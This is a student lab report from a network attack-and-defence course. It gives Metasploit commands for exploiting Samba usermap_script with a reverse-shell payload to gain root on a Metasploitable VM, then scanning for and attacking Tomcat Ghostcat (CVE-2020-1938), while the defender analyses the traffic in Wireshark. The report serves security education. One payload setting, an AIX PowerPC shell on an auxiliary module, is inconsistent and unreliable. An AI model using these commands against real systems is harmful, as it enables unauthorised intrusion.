20212909 2021-2022-2 《网络攻防实践》实践七报告
20212909 2021-2022-2 《网络攻防实践》实践七报告
一.实践内容
(1)使用Metasploit进行Linux远程渗透攻击
(2)实践作业:攻防对抗实践
主机名 | IP |
---|---|
kali | 192.168.200.6 |
Metasploitable_ubuntu | 192.168.200.123 |
二.实验过程
1.使用Metasploit进行Linux远程渗透攻击
- 启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
- 使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
- 选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
- 设置渗透攻击参数(RHOST,LHOST,TARGET等);
- 执行渗透攻击;
- 查看是否正确得到远程Shell,并查看获得的权限。
(1)打开kali,输入命令ping 192.168.200.123,
ping Metasploitable_ubuntu ip 连通性正常
(2)输入msfconsole
,启动Metasploit软件
(3)输入use exploit/multi/samba/usermap_script
,使用该模块进行攻击,输入show payloads
查看漏洞的载荷,选择第18个cmd/unix/reverse
。
(4)输入set payload cmd/unix/reverse
,设置双向连接载荷,输入show options
显示需要设置的参数。
(5)输入set RHOST 192.168.200.123
设置靶机地址,输入192.168.200.6
设置攻击机地址,输入run
进行攻击,输入ifconfig
查看ip配置信息
输入whoami
查看角色权限为root。
2.实践作业:攻防对抗实践 - 攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
- 防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。
(1)使用nmap扫描开放端口及端口程序版本
(2)在kali中输入/bin/systemctl start nessusd.service
开启Nessus,在浏览器输入https://localhost:8834/
进行漏洞扫描。
(3)扫描出9.8分的一个漏洞,编号为CVE-2020-1938
漏洞名称:Tomcat AJP协议漏洞
CVE编号:CVE-2020-1938
漏洞简介:2020年2月4日,Apache Tomcat官方发布了新的版本,该版本修复了一个影响所有版本(7.、8.、9.*)的文件包含漏洞,但官方暂未发布安全公告,2020年2月20日,CNVD发布了漏洞公告,对应漏洞编号:CNVD-2020-10487。漏洞是Tomcat AJP协议存在缺陷而导致,攻击者利用漏洞可以构造特定参数,读取服务器webapp/ROOT下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步通过文件包含实现远程代码执行。目前,厂商已发布新版本完成漏洞修复。
(4)在Metasploit中输入search CVE-2020-1938
查找可用的攻击模块
(5)输入use auxiliary/admin/http/tomcat_ghostcat
,使用该模块进行攻击。输入show payloads
查看负载模块
(6)输入set payload aix/ppc/shell_reverse_tcp
设置双向连接载荷。输入set RHOST 192.168.200.123
设置靶机地址,输入set LHOST 192.168.200.6
设置攻击机地址,输入 run
进行攻击。
(7)防守方打开wireshark查看抓包,查看tcp流内容,发现攻击方针对AJP13协议进行了攻击。
三.学习中遇到的问题
P1:Nessus没有扫描出来相应的后门漏洞
solution1:自己根据实际扫描的漏洞,攻击了Tomcat AJP协议漏洞。可以根据本实验的任务一漏洞再做一次,这里就不再重复了。
四.学习感想和体会
通过本次实验,对如何自己找漏洞,进行攻击有了一套完整的方法。